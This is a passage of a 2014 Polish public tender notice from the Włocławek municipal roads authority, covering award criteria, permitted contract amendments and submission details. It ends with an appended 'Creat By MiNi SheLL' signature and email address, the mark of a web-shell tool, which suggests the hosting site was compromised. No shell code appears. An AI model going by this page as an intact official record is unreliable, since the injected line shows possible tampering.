<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie postanowienia, które zostaną wprowadzone do treści umowy, wymagania dotyczące umów o podwykonawstwo, których przedmiotem są roboty budowlane, dostawy lub usługi oraz wysokość kar umownych z tytułu niewykonania lub nienależytego wykonania umowy zawarte są we wzorze umowy stanowiącym załącznik do niniejszej specyfikacji istotnych warunków. 
2.	Zamawiający dopuszcza możliwość wprowadzania zmian w umowie w stosunku
do treści oferty, które będą mogły być dokonane z powodu zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy lub w przypadku wystąpienia którejkolwiek z następujących sytuacji:

2.1. Możliwość przedłużenia terminu wykonania przedmiotu zamówienia w 
    przypadku zaistnienia zdarzeń, niezależnych  od Wykonawcy takich jak: 
a)	wystąpienia niekorzystnych warunków atmosferycznych powodujących wstrzymanie wykonania umowy w okresie dłuższym niż 5 dni kalendarzowych - potwierdzone pisemnie przez zamawiającego, przy czym przesunięcie terminu robót nastąpi o tyle dni, przez ile trwało ich wstrzymanie, 
b)	wystąpienia okoliczności siły wyższej - jako siłę wyższą należy rozumieć zdarzenia niezależne od żadnej ze Stron, zewnętrzne, niemożliwe do zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe, strajki oraz akty władzy i administracji publicznej, 
c)	pisemnego żądania wstrzymania prac skierowanego do Wykonawcy przez Zamawiającego lub wydania zakazu prowadzenia prac przez organ administracji publicznej o ile żądanie lub wydanie zakazów nie nastąpiło z przyczyn, za które Wykonawca ponosi odpowiedzialność, 
d)	wydania Wykonawcy polecenia, skutkującego koniecznością wydłużenia terminu zakończenia realizacji przedmiotu umowy, a w szczególności wydania Wykonawcy polecenia wstrzymania robót w związku z koniecznością ich skoordynowania z robotami realizowanymi przez gestorów sieci na terenie budowy lub innymi robotami realizowanymi w bezpośrednim sąsiedztwie terenu budowy na rzecz Zamawiającego;

2.2.	możliwość wprowadzenia lub/i zastosowania innej technologii wykonania robót.
2.3.	zmiany zakresu robót zgłoszonych do podwykonawstwa oraz zmiany  
            podwykonawcy, pod warunkiem wyrażenia zgody przez Zamawiającego,
2.4.      Zmiana podwykonawcy, który zgodnie z art. 26 ust. 2b ustawy pzp będzie podmiotem  
            udostępniającym zasoby niezbędne do realizacji zamówienia. W takim przypadku  
            Wykonawca zobowiązany jest zaproponować innego podwykonawcę spełniającego  
            (na dzień składania ofert) warunki określone przez Zamawiającego w SIWZ, wraz z  
             załączeniem wszystkich wymaganych oświadczeń i dokumentów określonych w IV.I    
             siwz, w zakresie którego dotyczą. 
2.5.	 zmiany przepisów prawa mające wpływ na postanowienia umowne.
3.	Wszelkie zmiany do umowy mogą nastąpić wyłącznie przez zmianę umowy o zamówienie publiczne to jest aneks do umowy i mogą być wprowadzone w okolicznościach i na zasadach  jak powyżej, wyłącznie przed zakończeniem terminu realizacji umowy.
4.	Wszelkie zmiany umowy wymagają pod rygorem nieważności formy pisemnej oraz podpisania przez obie strony umowy.
5.	Z wnioskiem o zmianę treści umowy może wystąpić zarówno Wykonawca, jak
i Zamawiający.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www. mzdwloclawek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Zarząd Dróg ul. Zielna 13/21, 87-800 Włocławek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.08.2014 godzina 10:00, miejsce: Miejski Zarząd Dróg ul. Zielna 13/21, 87-800 Włocławek, pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com